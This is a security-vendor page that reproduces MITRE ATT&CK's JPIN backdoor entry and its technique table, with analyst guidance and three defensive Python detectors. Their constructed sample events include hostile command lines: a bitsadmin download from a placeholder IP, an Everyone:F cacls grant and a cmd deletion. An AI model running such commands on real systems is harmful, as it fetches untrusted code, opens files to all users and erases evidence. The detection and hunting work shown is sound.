
S0201: JPIN

JPIN is a custom-built backdoor family used by PLATINUM. Evidence suggests developers of JPIN and Dipsind code bases were related in some way. [1]

Domain: Enterprise. ID: S0201. Type: Malware. Object version: 1.1.
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

JPIN matters because ATT&CK describes it as a custom Windows backdoor associated with PLATINUM, with relationships spanning discovery, command execution, command-and-control over file and mail protocols, obfuscation, process injection, keylogging, BITS abuse, file deletion, permission changes, and security-tool discovery or impairment. For leaders, the decision value is not just the malware name; it is whether Windows endpoint, network, and identity telemetry can prove what a backdoor learned, what it executed, what it transferred, and whether defenses were weakened.

Executive priority

Prioritize JPIN as a validation case for Windows endpoint resilience and incident readiness. The linked behaviors touch credential risk, security tooling trust, egress control, and evidence preservation. Executives should ask whether the organization can detect suspicious discovery and command execution, investigate possible credential capture, control file/mail protocol egress, and produce audit-ready evidence showing that endpoint controls and logs remain intact during a suspected backdoor intrusion.

Technical view

SOC and IR teams should map coverage around the related ATT&CK techniques rather than relying on a JPIN-specific signature, because ATT&CK provides no official detection text. Validate telemetry for Windows command shell activity, registry queries, service/process/user/group/system/file discovery, BITS job creation or modification, process injection indicators, file deletion, Windows permission changes, ingress tool transfer, and command-and-control over file transfer or mail protocols. Treat the PLATINUM relationship as historical ATT&CK context, not as proof of current activity in a local environment.

Likely telemetry

  • Windows endpoint process creation and command-line logs, especially cmd.exe and administrative discovery utilities
  • Registry query activity and registry access telemetry
  • Service, process, user, local group, system information, and file/directory enumeration events
  • BITS job creation, modification, transfer, and execution-related events
  • Endpoint memory, handle, module, or behavioral telemetry relevant to process injection

Detection direction

  • Build behavior-based detections around unusual clustering of discovery actions on Windows hosts, especially when followed by command shell use, file transfer, BITS activity, or file deletion.
  • Tune detections for dual-use administrative commands carefully; false positives are likely where help desk, software deployment, or inventory tooling performs similar discovery.
  • Validate visibility into BITS because it is a documented related technique and can blend with legitimate background transfer activity.
  • Review egress monitoring for file transfer and mail protocols; focus on unusual destinations, uncommon client processes, abnormal timing, or hosts that do not normally send such traffic.
  • Correlate security software discovery, tool disabling or modification, process injection, and permission changes as higher-risk combinations because they can indicate attempts to reduce defensive visibility.
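
A worked form of the correlation the Technical view, Likely telemetry and Detection direction items describe, added here as an example; it is not code from this page, from MITRE or from the Microsoft report. It runs over constructed Windows process-creation events (Sysmon event 1 or 4688 style fields: timestamp, host, user, image, command line) and alerts when one host shows several distinct discovery commands followed, inside a time window, by one of the follow-on actions this page ties to JPIN: a cacls.exe/icacls.exe permission change, a BITS transfer, or a file deletion through cmd.exe. The host names, user names, file paths and the 203.0.113.10 URL are constructed sample data, and the image-name-to-technique mapping is an assumption chosen for the example.

```python
"""Behavior-based correlation over Windows process-creation events:
a cluster of distinct discovery commands on one host, followed within a
window by a follow-on action this page ties to JPIN (cacls.exe permission
change, BITS transfer, file deletion). Sample events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Image name -> ATT&CK technique the command most often evidences (assumed mapping).
DISCOVERY = {
    "whoami.exe": "T1033", "net.exe": "T1069.001", "tasklist.exe": "T1057",
    "sc.exe": "T1007", "reg.exe": "T1012", "systeminfo.exe": "T1082",
    "ipconfig.exe": "T1016",
}
# Follow-on actions that turn a discovery cluster into an alert.
FOLLOW_ON = {"cacls.exe": "T1222.001", "icacls.exe": "T1222.001", "bitsadmin.exe": "T1197"}
DELETE_RE = re.compile(r"\b(del|erase)\b", re.I)          # cmd.exe /c del ... -> T1070.004
# Broad grants via cacls/icacls: /G or /P to Everyone or Users with Full or Change access.
PERMISSIVE_ACE = re.compile(r'/[GP]\s+"?(everyone|users|authenticated users)"?\s*:\s*[FC]\b', re.I)


def _image(event):
    """Lower-cased basename of the Image field, e.g. C:\\Windows\\System32\\reg.exe -> reg.exe."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def classify_follow_on(event):
    """Return the follow-on technique an event represents, or None."""
    name = _image(event)
    if name in FOLLOW_ON:
        return FOLLOW_ON[name]
    if name == "cmd.exe" and DELETE_RE.search(event["cmdline"]):
        return "T1070.004"
    return None


def analyze(events, window=timedelta(minutes=10), min_distinct=3):
    """One alert per host whose follow-on actions were preceded, within `window`,
    by at least `min_distinct` distinct discovery techniques. Raising
    min_distinct is the knob for help-desk and inventory-tool false positives."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    alerts = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])                   # ISO-8601 strings sort chronologically
        for i, e in enumerate(evs):
            tech = classify_follow_on(e)
            if tech is None:
                continue
            t = datetime.fromisoformat(e["ts"])
            seen = {DISCOVERY[_image(p)] for p in evs[:i]
                    if _image(p) in DISCOVERY
                    and t - datetime.fromisoformat(p["ts"]) <= window}
            if len(seen) < min_distinct:
                continue
            a = alerts.setdefault(host, {"host": host, "user": e["user"], "discovery": set(),
                                         "follow_on": [], "severity": "medium"})
            a["discovery"] |= seen
            a["follow_on"].append(tech)
            # A permission change that opens a file to Everyone/Users is the higher-risk combination.
            if tech == "T1222.001" and PERMISSIVE_ACE.search(e["cmdline"]):
                a["severity"] = "high"
    return list(alerts.values())


def _ev(ts, host, user, image, cmdline):
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}

S32 = "C:\\Windows\\System32\\"
# Constructed sample: WS01 shows the cluster, WS02 is ordinary help-desk activity.
SAMPLE_EVENTS = [
    _ev("2024-03-04T09:00:05", "WS01", "alice", S32 + "whoami.exe", "whoami /all"),
    _ev("2024-03-04T09:00:20", "WS01", "alice", S32 + "net.exe", "net localgroup administrators"),
    _ev("2024-03-04T09:00:41", "WS01", "alice", S32 + "tasklist.exe", "tasklist /svc"),
    _ev("2024-03-04T09:01:02", "WS01", "alice", S32 + "sc.exe", "sc query state= all"),
    _ev("2024-03-04T09:01:30", "WS01", "alice", S32 + "reg.exe",
        "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),
    _ev("2024-03-04T09:02:10", "WS01", "alice", S32 + "ipconfig.exe", "ipconfig /all"),
    _ev("2024-03-04T09:03:00", "WS01", "alice", S32 + "cacls.exe",
        "cacls C:\\ProgramData\\sys.dat /E /G Everyone:F"),
    _ev("2024-03-04T09:03:30", "WS01", "alice", S32 + "bitsadmin.exe",
        "bitsadmin /transfer upd /download /priority normal http://203.0.113.10/u.bin C:\\ProgramData\\u.bin"),
    _ev("2024-03-04T09:04:00", "WS01", "alice", S32 + "cmd.exe", "cmd.exe /c del /q C:\\ProgramData\\setup.tmp"),
    _ev("2024-03-04T10:15:00", "WS02", "helpdesk", S32 + "ipconfig.exe", "ipconfig /all"),
    _ev("2024-03-04T10:15:30", "WS02", "helpdesk", S32 + "tasklist.exe", "tasklist"),
    _ev("2024-03-04T10:16:00", "WS02", "helpdesk", S32 + "icacls.exe",
        "icacls C:\\Users\\bob\\Documents /grant bob:(OI)(CI)M"),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

WS02 performs two discovery commands and then a narrow icacls grant, so it stays below the default threshold; WS01 trips on six distinct discovery techniques followed by a world-writable grant, a BITS download and a deletion, and the Everyone:F grant lifts the severity. The window and min_distinct values are the two knobs to tune against inventory and deployment tooling in a real environment.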

Mitigation priorities

  • Start with evidence durability: centralize Windows endpoint, security tool, BITS, file, registry, and network logs so local deletion does not erase the investigation trail.
  • Harden Windows endpoints with least privilege, controlled administrative tool usage, and monitoring for permission changes to sensitive files and directories.
  • Restrict and monitor unnecessary outbound file transfer and mail protocol use from endpoints that do not require it for business operations.
  • Protect security tooling from tampering by monitoring service state, configuration changes, update failures, and unexpected termination of defensive processes.
  • Review credential-risk controls because keylogging is a related behavior; prioritize privileged users, administrative workstations, and systems handling sensitive access.
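
The egress item above (restrict and monitor FTP and mail protocol use from endpoints that do not need it) can be checked from network-connection telemetry. The following is an added example, not code from this page or from the Microsoft report: it learns from historical connection records which hosts already use FTP or SMTP, then flags connections after a cutoff for new protocol use by a host, destinations outside sanctioned servers, or an uncommon client process. The records are constructed in Sysmon event 3 style; the sanctioned network 198.51.100.0/24, the expected client binaries, the host names and the 203.0.113.x destinations are assumptions for the example.

```python
"""Egress baselining for the C2 channels this page lists for JPIN, FTP (T1071.002)
and mail protocols (T1071.003): learn which hosts use those protocols from
historical network-connection events, then flag new protocol use, destinations
outside sanctioned servers, and uncommon client processes. Records are
constructed in the Sysmon network-connection style (host, image, dst_ip, dst_port)."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

WATCHED_PORTS = {21: "ftp", 25: "smtp", 465: "smtp", 587: "smtp"}
# Sanctioned servers and expected client binaries per protocol (assumed for the example).
SANCTIONED_NETS = {"ftp": [ip_network("198.51.100.0/24")], "smtp": [ip_network("198.51.100.0/24")]}
EXPECTED_CLIENTS = {"ftp": {"ftp.exe", "winscp.exe"}, "smtp": {"outlook.exe"}}


def _client(flow):
    return flow["image"].rsplit("\\", 1)[-1].lower()


def build_baseline(flows, cutoff):
    """Per host, the watched protocols seen before `cutoff` (ISO-8601 timestamp)."""
    baseline = defaultdict(set)
    for f in flows:
        if f["ts"] < cutoff and f["dst_port"] in WATCHED_PORTS:
            baseline[f["host"]].add(WATCHED_PORTS[f["dst_port"]])
    return baseline


def detect_egress(flows, cutoff):
    """Alerts for watched-protocol connections after `cutoff`, each with the reasons it tripped."""
    baseline = build_baseline(flows, cutoff)
    alerts = []
    for f in flows:
        if f["ts"] < cutoff or f["dst_port"] not in WATCHED_PORTS:
            continue
        proto = WATCHED_PORTS[f["dst_port"]]
        reasons = []
        if proto not in baseline.get(f["host"], set()):
            reasons.append("host has no baseline for " + proto)
        dst = ip_address(f["dst_ip"])
        if not any(dst in net for net in SANCTIONED_NETS[proto]):
            reasons.append("destination outside sanctioned " + proto + " servers")
        if _client(f) not in EXPECTED_CLIENTS[proto]:
            reasons.append("uncommon client process " + _client(f))
        if reasons:
            alerts.append({"host": f["host"], "proto": proto, "dst": f["dst_ip"],
                           "client": _client(f), "reasons": reasons})
    return alerts


def _flow(ts, host, image, dst_ip, dst_port):
    return {"ts": ts, "host": host, "image": image, "dst_ip": dst_ip, "dst_port": dst_port}

OUTLOOK = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"
CUTOFF = "2024-03-04T00:00:00"
FLOWS = [
    # baseline period: WS02 submits mail through the sanctioned relay; WS01 only browses
    _flow("2024-03-01T08:00:00", "WS02", OUTLOOK, "198.51.100.25", 587),
    _flow("2024-03-02T08:05:00", "WS02", OUTLOOK, "198.51.100.25", 587),
    _flow("2024-03-02T09:00:00", "WS01", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "203.0.113.5", 443),
    # detection period
    _flow("2024-03-04T09:05:00", "WS02", OUTLOOK, "198.51.100.25", 587),
    _flow("2024-03-04T09:06:00", "WS01", "C:\\ProgramData\\upd.exe", "203.0.113.50", 25),
    _flow("2024-03-04T09:30:00", "WS02", "C:\\Windows\\System32\\ftp.exe", "203.0.113.60", 21),
]

if __name__ == "__main__":
    for a in detect_egress(FLOWS, CUTOFF):
        print(a)
```

WS02's routine Outlook submission to the sanctioned relay produces nothing; WS01's SMTP connection from a binary under ProgramData to an unsanctioned address trips all three reasons, and WS02's first-ever FTP session to an unsanctioned host trips two. In practice the baseline window should cover at least one business cycle, and the "no baseline" reason alone is noisy on newly imaged hosts, so weight it below the destination and client-process reasons.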

Analyst notes and limits

ATT&CK identifies JPIN as a custom-built backdoor family used by PLATINUM and notes a possible code-base relationship with Dipsind. The object is Windows-platform malware, while several related techniques have broader platform listings; this take applies the relationships to JPIN conservatively in a Windows defense context.

Official detection guidance is not provided, and the malware object has no specified tactics. This summary is derived from the supplied ATT&CK description, external references, and relationships only. Local prevalence, exploitation status, customer exposure, and detection coverage require environment-specific evidence.

Official MITRE ATT&CK definition

JPIN

JPIN is a custom-built backdoor family used by PLATINUM. Evidence suggests developers of JPIN and Dipsind code bases were related in some way. [1]

The same entry is available on attack.mitre.org (MITRE-hosted reference).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

20 rows
Domain, ID, Name, Relationship / procedure (citation [1] is Microsoft PLATINUM April 2016)

Enterprise T1562.001 Disable or Modify Tools Sub-technique

JPIN can lower security settings by changing Registry keys. [1]

Enterprise T1222.001 Windows Permissions Sub-technique

JPIN can use the command-line utility cacls.exe to change file permissions. [1]

Enterprise T1059.003 Windows Command Shell Sub-technique

JPIN can use the command-line utility cacls.exe to change file permissions. [1]

Enterprise T1069.001 Local Groups Sub-technique

JPIN can obtain the permissions of the victim user. [1]

Enterprise T1016 System Network Configuration Discovery

JPIN can obtain network information, including DNS, IP, and proxies. [1]

Enterprise T1057 Process Discovery

JPIN can list running processes. [1]

Enterprise T1070.004 File Deletion Sub-technique

JPIN's installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running. [1]

Enterprise T1012 Query Registry

JPIN can enumerate Registry keys. [1]

Enterprise T1197 BITS Jobs

A JPIN variant downloads the backdoor payload via the BITS service. [1]

Enterprise T1071.003 Mail Protocols Sub-technique

JPIN can send email over SMTP. [1]

Enterprise T1083 File and Directory Discovery

JPIN can enumerate drives and their types. It can also change file permissions using cacls.exe. [1]

Enterprise T1055 Process Injection

JPIN can inject content into lsass.exe to load a module. [1]

Enterprise T1105 Ingress Tool Transfer

JPIN can download files and upgrade itself. [1]

Enterprise T1056.001 Keylogging Sub-technique

JPIN contains a custom keylogger. [1]

Enterprise T1033 System Owner/User Discovery

JPIN can obtain the victim user name. [1]

Enterprise T1071.002 File Transfer Protocols Sub-technique

JPIN can communicate over FTP. [1]

Enterprise T1518.001 Security Software Discovery Sub-technique

JPIN checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them. [1]

Enterprise T1082 System Information Discovery

JPIN can obtain system information such as OS version and disk space. [1]

Enterprise T1027 Obfuscated Files or Information

JPIN uses an encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer. [1]

Enterprise T1007 System Service Discovery

JPIN can list running services. [1]
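
The T1027 row records an encrypted, compressed payload stored in the installer's resource section and disguised as a bitmap. A practical triage check is whether a resource that claims to be a bitmap actually parses as one and whether its bytes look encrypted. The following is an added example, not code from this page, from MITRE or from the Microsoft report: it takes raw resource bytes (assumed already extracted from the PE by whatever resource parser the analyst uses), validates the BMP file and info headers structurally rather than trusting the "BM" magic, and measures byte entropy. Both samples are constructed in the block: a genuine single-colour BMP and a SHA-256 chain standing in for an encrypted blob; the 7.2 entropy threshold is an assumption.

```python
"""Check whether a 'bitmap' resource is really a bitmap. The T1027 row on this
page records a JPIN installer keeping an encrypted, compressed payload disguised
as a bitmap in its resource section; a structurally invalid or high-entropy
RT_BITMAP resource is the signal. Input is raw resource bytes (assumed already
extracted by a PE parser); samples are constructed in-line."""
import hashlib
import math
import struct


def shannon_entropy(data):
    """Bits per byte; near 8.0 for encrypted or well-compressed data, low for flat images."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_like_bmp(data):
    """Structural check of BITMAPFILEHEADER + BITMAPINFOHEADER, not just the 'BM' magic."""
    if len(data) < 54 or data[:2] != b"BM":
        return False
    bf_size, _r1, _r2, off_bits = struct.unpack_from("<IHHI", data, 2)
    bi_size, width, height, planes, bpp = struct.unpack_from("<IiiHH", data, 14)
    if bf_size != len(data) or off_bits < 54 or off_bits > len(data):
        return False
    if bi_size not in (40, 108, 124) or planes != 1 or bpp not in (1, 4, 8, 16, 24, 32):
        return False
    if width <= 0 or height == 0:
        return False
    stride = ((width * bpp + 31) // 32) * 4          # rows are padded to 4 bytes
    return off_bits + stride * abs(height) <= len(data)


def assess_resource(data, entropy_threshold=7.2):
    """Flag a resource that is not a well-formed BMP or whose bytes look encrypted."""
    ent = shannon_entropy(data)
    valid = looks_like_bmp(data)
    return {"valid_bmp": valid, "entropy": round(ent, 2),
            "suspicious": (not valid) or ent >= entropy_threshold}


def make_bmp(width, height, bgr=(0x60, 0x40, 0x20)):
    """A genuine 24-bit uncompressed BMP of one colour (constructed benign sample)."""
    stride = ((width * 24 + 31) // 32) * 4
    rows = b"".join(bytes(bgr) * width + b"\x00" * (stride - 3 * width) for _ in range(height))
    file_header = b"BM" + struct.pack("<IHHI", 54 + len(rows), 0, 0, 54)
    info_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(rows), 2835, 2835, 0, 0)
    return file_header + info_header + rows


def make_disguised_blob(length, seed=b"constructed-example"):
    """Stand-in for an encrypted payload behind a bare 'BM' magic: a SHA-256 chain
    gives deterministic, near-uniform bytes without shipping any real payload."""
    out = bytearray(b"BM")
    block = seed
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:length])


if __name__ == "__main__":
    print("benign  :", assess_resource(make_bmp(16, 8)))
    print("disguise:", assess_resource(make_disguised_blob(4096)))
```

The structural check is the stronger signal: a real bitmap resource must have a file size that matches the header and a pixel array that fits the declared geometry. The entropy threshold alone will flag legitimate photographic bitmaps, so treat a high entropy reading on a structurally valid BMP as a lower-confidence indicator and a header mismatch as the one worth pulling the resource for.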

Associated objects

Groups, software, and campaigns

Group Enterprise

G0068: PLATINUM

PLATINUM is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. [1]

Relationship explorer

All related ATT&CK context

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.

ATT&CK release: 19.1
Object version: 1.1
Created:
Modified:
Raw hash: 6b6faed376a315c7...

Imported snapshots across ATT&CK releases (1)
Release 19.1, object version 1.1, status: current bundle, raw hash 6b6faed376a3…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018. (Cited in ATT&CK as "Microsoft PLATINUM April 2016".)
  2. [2] JPIN (ATT&CK name entry; citation: Microsoft PLATINUM April 2016).
  3. [3] mitre-attack S0201 (ATT&CK source object record).

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.